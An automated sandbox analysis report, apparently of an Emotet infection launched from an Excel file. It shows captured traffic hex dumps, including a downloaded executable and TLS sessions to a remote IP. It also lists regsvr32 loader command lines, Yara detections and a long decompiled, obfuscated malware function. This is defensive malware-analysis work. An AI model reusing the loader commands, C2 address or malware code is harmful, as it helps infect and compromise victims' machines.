28 d0 20 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 ea 04 00 00 dc 04 00 00 00 00 00 f0 ae 03 00 00 10 00 00 00 00 05 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 0e 06 00 ab 00 00 00 04 f0 05 00 f0 00 00 00 00 80 06 00 80 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 20 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 99 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 a8 05 00 00 7c ef 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e e9 04 00 00 10 00 00 00 ea 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ab 0e 01 00 00 00 05 00 00 10 01 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 68 00 00 00 10 06 00 00 2e 00 00 00 fe 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 76 02 00 00 80 06 00 00 78 02 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 e9 00 00 00 00 09 00 00 ea 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$/ZAAAh,Ah:A@AAA,AAAAARichAPEL( b!@v @@\|@.text `.rdata@@.data`h.@.rsrcvx,@@.reloc@B
Mar 4, 2022 15:23:44.961986065 CET	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: UQMM1)
Mar 4, 2022 15:23:44.962038040 CET	12	IN	Data Raw: 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 3d 00 00 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 00 83 e8 10 8b e5 5d c3 cc cc cc cc Data Ascii: B]UQMEPM=E]UQME]U4]UQMEPPMQM]UM}uM}uhWMEMM+MURM]EE
Mar 4, 2022 15:23:44.962090015 CET	14	IN	Data Raw: 75 ee 8b 4d fc 2b 4d f8 89 4d f0 8b 45 f0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 68 0e 00 07 80 e8 f3 f9 ff ff 5d c3 cc 55 8b ec 83 ec 1c 89 4d ec 8b 4d ec e8 bf fa ff ff 89 45 f0 8b 45 f0 8b 48 04 89 4d f8 8b 55 f0 8b Data Ascii: uM+MME]Uh]UMMEEHMUMBEjMQUME}uE;E}MMUUEEMQMPURMPEMHMURM]U
Mar 4, 2022 15:23:44.962141991 CET	15	IN	Data Raw: 5d c3 cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 21 00 00 00 8b 45 08 83 e0 01 74 09 8b 4d fc 51 e8 b0 f1 ff ff 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc c7 00 bc 0d 05 10 8b 4d fc e8 08 fe ff ff 8b e5 5d Data Ascii: ]UQMM!EtMQE]UQMEM]UQMM{EtE]UQMM*EtMQ@E]UQMM!EtMQE]UjhidPQD'3PE
Mar 4, 2022 15:23:44.962254047 CET	17	IN	Data Raw: 83 ec 1c 89 4d e4 8b 45 e4 83 78 58 00 74 57 8d 4d f0 e8 c6 f8 ff ff 8d 4d f0 e8 be f8 ff ff 50 8b 4d e4 e8 05 ff ff ff 8b 4d 0c 89 4d e8 8b 55 10 89 55 ec 8b 45 ec 50 8b 4d e8 51 8d 4d f0 e8 49 00 00 00 85 c0 75 1c 8b 55 e4 c7 42 58 00 00 00 00 Data Ascii: MExXtWMMPMMMUUEPMQMIuUBX\jMKE@XjM3MK]UQMEPMQUR]UQMEPjMQ R]UQMEH QP]UQM
Mar 4, 2022 15:23:44.962306023 CET	18	IN	Data Raw: 51 ff 15 d4 04 05 10 50 e8 e5 2a 02 00 8b e5 5d c3 cc cc 55 8b ec 51 89 4d fc 8b 45 08 8b 48 04 51 8b 55 fc 8b 42 20 50 ff 15 d8 04 05 10 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 48 20 51 ff Data Ascii: QP*]UQMEHQUB P]UQMEH QPX]UjhdPD'3PEd=h<MEhhMPjMLhM?MPE}t$jjEP
Mar 4, 2022 15:23:44.962357044 CET	19	IN	Data Raw: 8b 4d 08 51 e8 c0 73 03 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 50 8b 4d 08 51 e8 10 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 50 8b 4d 08 51 e8 ce 75 03 00 83 c4 08 5d c3 cc cc cc cc Data Ascii: MQs]UEPMQ]UEPMQu]UMjMd:P$E} j0EPMA\jM]UQMEPME]UQMEPM-E]
Mar 4, 2022 15:23:44.962409019 CET	21	IN	Data Raw: 8b ec 83 ec 58 dd 05 30 11 05 10 dc 65 08 dd 5d f8 dd 05 28 11 05 10 dc 5d f8 df e0 f6 c4 41 75 0e dd 05 20 11 05 10 dc 45 f8 dd 5d f8 eb 1c dd 05 18 11 05 10 dc 5d f8 df e0 f6 c4 05 7a 0c dd 05 20 11 05 10 dc 65 f8 dd 5d f8 dd 45 f8 e8 0c 71 03 Data Ascii: X0e](]Au E]]z e]Eq]E%MEMeUEE}EEm]mMMUEEMeMUE}E
Mar 4, 2022 15:23:44.962460041 CET	22	IN	Data Raw: 8b 45 fc 03 45 f4 89 45 fc 8b 4d f4 83 c1 01 89 4d f4 8b 55 fc 03 55 f4 89 55 fc 78 16 8b 45 f8 83 e8 01 89 45 f8 8b 4d f8 d1 e1 8b 55 fc 2b d1 89 55 fc 8b 45 f4 3b 45 f8 0f 8e d1 fd ff ff 8b e5 5d c3 cc cc 55 8b ec 51 89 4d fc b8 e8 10 05 10 8b Data Ascii: EEEMMUUUxEEMU+UE;E]UQM]UjhdPQD'3PEdMMEETMTWM\LMhEMx2EMEhMxlMA\|
Mar 4, 2022 15:23:45.063043118 CET	24	IN	Data Raw: 4d e4 83 c1 68 e8 91 e4 ff ff 50 8b 4d e4 e8 98 00 00 00 8b e5 5d c3 cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 40 04 8b 4d fc 03 41 0c 99 2b c2 d1 f8 50 8b 55 fc 8b 02 8b 4d fc 03 41 08 99 2b c2 d1 f8 50 8b 4d 08 e8 0e 00 00 00 8b 45 08 8b e5 Data Ascii: MhPM]UQME@MA+PUMA+PME]UQMEMUEBE]UQMEPPM5]UQMEPMQUB P]UQM]

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	186.250.48.5	80	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Mar 4, 2022 15:24:05.760483027 CET	674	OUT	Data Raw: 16 03 03 00 92 01 00 00 8e 03 03 62 22 9f b9 ad f8 47 cf 3b 76 04 2e 35 87 9c 00 f3 2f 4a 54 c4 4e 27 e0 32 df a3 e0 8a 55 2e 53 00 00 34 c0 28 c0 27 c0 14 c0 13 00 9f 00 9e 00 39 00 33 00 9d 00 9c 00 3d 00 3c 00 35 00 2f c0 2c c0 2b c0 24 c0 23 Data Ascii: b"G;v.5/JTN'2U.S4('93=<5/,+$#j@821
Mar 4, 2022 15:24:05.990631104 CET	676	IN	Data Raw: 16 03 03 00 5d 02 00 00 59 03 03 9d e3 4c a8 d9 5e ec 15 58 5b 08 cf ff 8e fb 97 cd 8a 74 2d c1 bc e4 f3 5c e4 9b a6 87 45 e8 d8 20 37 11 78 26 42 2a 51 7a 79 22 5a e5 83 22 09 72 14 43 a3 85 8f ce 3a bf 95 1b d1 b6 d3 b0 96 2a c0 28 00 00 11 ff Data Ascii: ]YL^X[t-\E 7x&BQzy"Z"rC:(00A[g.^q0*H0w10UGB10ULondon10ULondon10UGlobal Security10
Mar 4, 2022 15:24:05.990685940 CET	676	IN	Data Raw: 36 3f a6 aa d4 53 0b 82 75 88 fe 8d da 35 e2 39 48 4e 72 8a 70 97 22 c1 6a 0c 1d 74 07 bc c7 da c5 3f 3e f4 ac 59 7f 09 b6 43 f2 41 9d fb 14 c7 07 2f 57 f6 bb b5 93 7c 49 bb f3 44 05 26 6a e7 41 c9 34 d9 0e 1f f4 17 85 cb 43 51 68 c6 c6 f9 82 36 Data Ascii: 6?Su59HNrp"jt?>YCA/W\|ID&jA4CQh6lsFt
Mar 4, 2022 15:24:06.008779049 CET	676	OUT	Data Raw: 16 03 03 00 46 10 00 00 42 41 04 41 41 92 6f 69 b0 ca 70 0c 07 2a 82 d5 db 62 3a 85 3c b8 07 69 61 a3 36 8d 4b 21 fc 8b 2e 92 b0 b5 ca e8 f7 58 1f 47 d1 37 77 a6 ed c7 35 c5 74 7d 40 eb 82 bc 75 87 fd 16 91 5b 93 d7 7b 44 50 14 03 03 00 01 01 16 Data Ascii: FBAAAoip*b:<ia6K!.XG7w5t}@u[{DP`oGxs`xk\e4bpEaV[vSnG+Mb6Q$UVzUE{ lUuqGS
Mar 4, 2022 15:24:06.227893114 CET	676	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 60 c2 c2 a6 40 e0 6c b1 63 4a df 2b af 0f 7f 3c 72 f3 60 df 41 c3 56 79 ab ab 40 d5 6d 7e 7b 32 76 95 f1 ba a1 95 02 69 79 3b 08 8a bc a7 55 4d a3 ad 51 85 ec 57 4f 90 31 fd f9 77 a6 04 a6 bb a4 d1 66 09 b2 b3 ee d6 Data Ascii: `@lcJ+<r`AVy@m~{2viy;UMQWO1wf$B#XRWT"D
Mar 4, 2022 15:24:08.900671005 CET	742	OUT	Data Raw: 17 03 03 01 f0 3e 9f 21 c6 78 2b dc 69 c9 f1 ae c9 ee d5 74 6d b2 73 2b 64 fa 8b 09 6b 38 88 19 cc 80 66 55 5e 89 5c 75 f3 bb 76 86 92 60 88 77 2b 28 9b fa 46 bc ec 9d e2 74 aa b3 0d 3f 0d 44 c3 d1 96 56 79 32 19 77 b2 e4 88 11 8b f5 5b 52 74 55 Data Ascii: >!x+itms+dk8fU^\uv`w+(Ft?DVy2w[RtU8-?TjcU1"=*?YV`~#0@OYKDlekrWh[2>P}?oE#SDN/`YY)O\$7NQv6J nU1%pFF8Sj
Mar 4, 2022 15:24:12.039079905 CET	743	IN	Data Raw: 17 03 03 02 c0 10 e9 21 f2 a4 b4 1d 7f 5e 47 66 c9 39 bb 3c 48 ff a0 6c 83 34 8e 4e 04 59 06 b2 68 a1 4b 8f f3 94 8a c2 ee 2a 3a c9 a7 4e fe 79 aa b2 5c 7a 7e 5c 09 cf 65 e2 15 65 f4 50 94 35 b6 69 0f 87 58 f8 4f a3 19 e4 a8 27 a4 5e 32 d5 96 31 Data Ascii: !^Gf9<Hl4NYhK:Ny\z~\eeP5iXO'^21>~^k+z{khT8D:GAmecjUO,E{fznm6<8K2[5Xb9DINyrDVlOEm3K1jo
Mar 4, 2022 15:24:15.036221027 CET	743	IN	Data Raw: 15 03 03 00 50 7b 86 e2 57 87 d6 c0 4e 4d aa a7 17 db 99 a4 29 14 1d f8 17 88 51 59 21 d2 ea c6 aa ff 00 0a 79 f6 b4 9a 49 b8 aa cb 9b 98 45 bd 98 ab 41 4d 31 0b dd 52 c2 91 ec cd 4d 2d bd a7 6b 0e 6b 9f 5d 8c 77 75 07 c9 60 8c 4d 27 2e c2 02 72 Data Ascii: P{WNM)QY!yIEAM1RM-kk]wu`M'.r>d

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 820, Parent PID: 596

General

Target ID:	0
Start time:	15:24:13
Start date:	04/03/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13ff30000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2092, Parent PID: 820

General

Target ID:	3
Start time:	15:24:22
Start date:	04/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
Imagebase:	0xda0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.420143508.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2236, Parent PID: 2092

General

Target ID:	4
Start time:	15:24:24
Start date:	04/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh"
Imagebase:	0xda0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.426206883.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2628, Parent PID: 2236

General

Target ID:	5
Start time:	15:24:27
Start date:	04/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cfuxhhimriog\usertmslb.fpr"
Imagebase:	0xda0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.434777664.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 772, Parent PID: 2628

General

Target ID:	6
Start time:	15:24:31
Start date:	04/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mgmxxtvaciu\fmyrhviayqbjkvb.voe"
Imagebase:	0xda0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.693604509.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 2092, Parent PID: 820COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	34.4%
Signature Coverage:	23.2%
Total number of Nodes:	689
Total number of Limit Nodes:	17

Executed Functions

Function 10011FD0 Relevance: 23.7, Strings: 18, Instructions: 1176
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E10011FD0() {
				signed int _v12;
				intOrPtr _v16;
				signed int _v24;
				signed int _v32;
				signed int _v40;
				signed int _v56;
				char _v72;
				signed int _v76;
				char _v92;
				signed int _v100;
				char _v120;
				char _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v160;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				unsigned int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				unsigned int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				unsigned int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				unsigned int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				unsigned int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				void* _t1253;
				signed int _t1254;
				signed int _t1257;
				signed int _t1276;
				signed int _t1292;
				signed int _t1306;
				signed int _t1329;
				signed int _t1330;
				signed int _t1332;
				signed int _t1333;
				signed int _t1334;
				signed int _t1335;
				signed int _t1336;
				signed int _t1337;
				signed int _t1338;
				signed int _t1339;
				signed int _t1340;
				signed int _t1341;
				signed int _t1342;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1470;
				signed int _t1471;
				signed int _t1472;
				signed int _t1475;
				signed int _t1482;
				signed int _t1501;
				signed int _t1504;
				void* _t1506;
				void* _t1513;
				void* _t1514;
				void* _t1515;

				_t1506 = (_t1504 & 0xfffffff8) - 0x298;
				_v144 = _v144 & 0x00000000;
				_v140 = _v140 & 0x00000000;
				_v152 = 0x585f78;
				_v148 = 0x8b1386;
				_v484 = 0xd05698;
				_v484 = _v484 | 0xa7831dd8;
				_t1332 = 0x5d;
				_v484 = _v484 / _t1332;
				_v484 = _v484 ^ 0x01cdf9c7;
				_t1475 = 0x48c97d6;
				_v640 = 0x869538;
				_v640 = _v640 | 0x58be54fc;
				_v640 = _v640 + 0xffff4fd1;
				_v640 = _v640 << 2;
				_v640 = _v640 ^ 0x62f89734;
				_v192 = 0x82a86e;
				_v192 = _v192 << 8;
				_v192 = _v192 ^ 0x82a86e00;
				_v452 = 0x7e9329;
				_v452 = _v452 | 0x75a7c476;
				_v452 = _v452 + 0xffff19d2;
				_v452 = _v452 ^ 0x75f612a5;
				_v400 = 0x73cf61;
				_v400 = _v400 | 0xa0ad4d0b;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x05099930;
				_v540 = 0x9821f3;
				_v540 = _v540 | 0x3b241c00;
				_v540 = _v540 >> 9;
				_t1333 = 0x2d;
				_v540 = _v540 / _t1333;
				_v540 = _v540 ^ 0x00072b76;
				_v556 = 0x92dc7b;
				_t1334 = 0x61;
				_v556 = _v556 / _t1334;
				_v556 = _v556 + 0xffff270c;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000aaeb4;
				_v244 = 0xda6d7a;
				_v244 = _v244 + 0xffffcf6d;
				_v244 = _v244 ^ 0x00d13b16;
				_v536 = 0x964436;
				_v536 = _v536 + 0xc92e;
				_v536 = _v536 + 0x7cec;
				_v536 = _v536 + 0xffff4009;
				_v536 = _v536 ^ 0x009de818;
				_v272 = 0x4db1b7;
				_v272 = _v272 + 0xd3fa;
				_v272 = _v272 ^ 0x004150ff;
				_v448 = 0xd42e6e;
				_v448 = _v448 << 8;
				_v448 = _v448 | 0x321c08b1;
				_v448 = _v448 ^ 0xf633d973;
				_v440 = 0xdda6ff;
				_v440 = _v440 ^ 0xe88b90fb;
				_v440 = _v440 * 0x5e;
				_v440 = _v440 ^ 0x4fad4c06;
				_v248 = 0xd39131;
				_v248 = _v248 ^ 0x59357490;
				_v248 = _v248 ^ 0x59e88c4e;
				_v520 = 0xbc3f65;
				_t1470 = 0x50;
				_v520 = _v520 / _t1470;
				_v520 = _v520 >> 0xb;
				_t1335 = 0x35;
				_v520 = _v520 * 0x6a;
				_v520 = _v520 ^ 0x000445c0;
				_v432 = 0x258210;
				_v432 = _v432 >> 7;
				_v432 = _v432 + 0xffffa0a4;
				_v432 = _v432 ^ 0xfffb2e05;
				_v364 = 0x6567e7;
				_t131 =  &_v364; // 0x6567e7
				_v364 =  *_t131 * 0x44;
				_v364 = _v364 + 0xffffa8e1;
				_v364 = _v364 ^ 0x1ae4a185;
				_v396 = 0x87abb4;
				_v396 = _v396 ^ 0xe1d34346;
				_v396 = _v396 + 0xffff7294;
				_v396 = _v396 ^ 0xe153da55;
				_v204 = 0x5b36f;
				_v204 = _v204 >> 9;
				_v204 = _v204 ^ 0x0006d7f3;
				_v656 = 0xe08f20;
				_v656 = _v656 + 0xc5a5;
				_v656 = _v656 / _t1335;
				_t1336 = 0x3e;
				_v656 = _v656 * 0x76;
				_v656 = _v656 ^ 0x01fc5399;
				_v264 = 0xfc8dfc;
				_v264 = _v264 << 0xb;
				_v264 = _v264 ^ 0xe466c81e;
				_v428 = 0x7b0fc8;
				_v428 = _v428 << 0xc;
				_v428 = _v428 ^ 0x919bd458;
				_v428 = _v428 ^ 0x21665b45;
				_v256 = 0x9b1477;
				_v256 = _v256 ^ 0xa7378dfd;
				_v256 = _v256 ^ 0xa7abcc2b;
				_v456 = 0xf1b21a;
				_v456 = _v456 * 0x6c;
				_v456 = _v456 >> 0xf;
				_v456 = _v456 ^ 0x00023159;
				_v528 = 0x80b354;
				_v528 = _v528 + 0x43a5;
				_v528 = _v528 / _t1336;
				_v528 = _v528 >> 0x10;
				_v528 = _v528 ^ 0x0007ec26;
				_v240 = 0x887618;
				_v240 = _v240 >> 9;
				_v240 = _v240 ^ 0x000c66d5;
				_v344 = 0xfdf69a;
				_v344 = _v344 + 0xffffae5a;
				_v344 = _v344 ^ 0x00f88644;
				_v252 = 0xbe216b;
				_v252 = _v252 + 0xffff6388;
				_v252 = _v252 ^ 0x00bb5707;
				_v368 = 0x7b3ea9;
				_v368 = _v368 >> 6;
				_v368 = _v368 | 0x49c4cda4;
				_v368 = _v368 ^ 0x49c92824;
				_v376 = 0xa5a6dd;
				_v376 = _v376 | 0xdaac68b6;
				_t1337 = 0x42;
				_v376 = _v376 / _t1337;
				_v376 = _v376 ^ 0x03594e9d;
				_v188 = 0xd729c;
				_v188 = _v188 << 2;
				_v188 = _v188 ^ 0x00345abf;
				_v260 = 0xd504d2;
				_v260 = _v260 ^ 0xe1a41ad5;
				_v260 = _v260 ^ 0xe17e3c09;
				_v404 = 0x35379b;
				_v404 = _v404 << 2;
				_v404 = _v404 + 0x5909;
				_v404 = _v404 ^ 0x00d17b8a;
				_v324 = 0xc8fc16;
				_v324 = _v324 + 0xffffa91f;
				_v324 = _v324 ^ 0x00c2a98e;
				_v348 = 0x957303;
				_t1338 = 0x46;
				_v348 = _v348 / _t1338;
				_v348 = _v348 ^ 0x00013a42;
				_v564 = 0x6f213c;
				_v564 = _v564 << 1;
				_t1339 = 0x15;
				_v564 = _v564 * 0x7e;
				_v564 = _v564 / _t1339;
				_v564 = _v564 ^ 0x05389056;
				_v620 = 0xda2a87;
				_v620 = _v620 >> 1;
				_v620 = _v620 | 0x1b17c7ec;
				_v620 = _v620 * 0x58;
				_v620 = _v620 ^ 0x73f3706a;
				_v612 = 0x43fe6e;
				_v612 = _v612 + 0xffffa5b3;
				_v612 = _v612 * 0x5e;
				_v612 = _v612 * 0x48;
				_v612 = _v612 ^ 0xfc4f4f3f;
				_v200 = 0xca1fa8;
				_v200 = _v200 + 0xffff9090;
				_v200 = _v200 ^ 0x00c76fdd;
				_v476 = 0x3cfd;
				_v476 = _v476 + 0xffff5e10;
				_v476 = _v476 * 0x17;
				_v476 = _v476 ^ 0xfff3a141;
				_v356 = 0x8f4378;
				_v356 = _v356 + 0xffff823c;
				_v356 = _v356 | 0xd2d05931;
				_v356 = _v356 ^ 0xd2d5298c;
				_v316 = 0x65d44c;
				_v316 = _v316 * 0xd;
				_v316 = _v316 ^ 0x052f5dd9;
				_v468 = 0x37fadc;
				_v468 = _v468 << 0xd;
				_v468 = _v468 + 0xffffcf7b;
				_v468 = _v468 ^ 0xff57fcbb;
				_v412 = 0xfecd39;
				_v412 = _v412 * 0x33;
				_v412 = _v412 + 0x665;
				_v412 = _v412 ^ 0x32c58650;
				_v308 = 0xb12fac;
				_v308 = _v308 ^ 0x72df1fbd;
				_v308 = _v308 ^ 0x7260b039;
				_v524 = 0x7c61ae;
				_v524 = _v524 << 2;
				_v524 = _v524 | 0x19ce07de;
				_v524 = _v524 + 0x1864;
				_v524 = _v524 ^ 0x19faaa82;
				_v236 = 0x6c04e0;
				_v236 = _v236 << 9;
				_v236 = _v236 ^ 0xd8089482;
				_v460 = 0x4b1d34;
				_v460 = _v460 << 3;
				_v460 = _v460 | 0xe0aece32;
				_v460 = _v460 ^ 0xe2f59919;
				_v604 = 0xc2ddc;
				_v604 = _v604 >> 2;
				_v604 = _v604 >> 5;
				_t1501 = 0x34;
				_v604 = _v604 / _t1501;
				_v604 = _v604 ^ 0x000d2c77;
				_v380 = 0x3f3994;
				_v380 = _v380 ^ 0x64eadd87;
				_v380 = _v380 << 0xe;
				_v380 = _v380 ^ 0x790466d7;
				_v596 = 0x2b1ad3;
				_t1340 = 9;
				_v596 = _v596 / _t1340;
				_v596 = _v596 << 3;
				_v596 = _v596 + 0xffff8013;
				_v596 = _v596 ^ 0x00280eec;
				_v228 = 0x1d3b29;
				_v228 = _v228 + 0xffffb6c6;
				_v228 = _v228 ^ 0x0013cab4;
				_v300 = 0x9a9568;
				_v300 = _v300 ^ 0x94a09f9a;
				_v300 = _v300 ^ 0x9435818e;
				_v444 = 0xa7702a;
				_v444 = _v444 | 0x20cf78cf;
				_v444 = _v444 + 0xffff3395;
				_v444 = _v444 ^ 0x20ed17e8;
				_v532 = 0x87e232;
				_t1341 = 0x6c;
				_v532 = _v532 / _t1341;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 << 2;
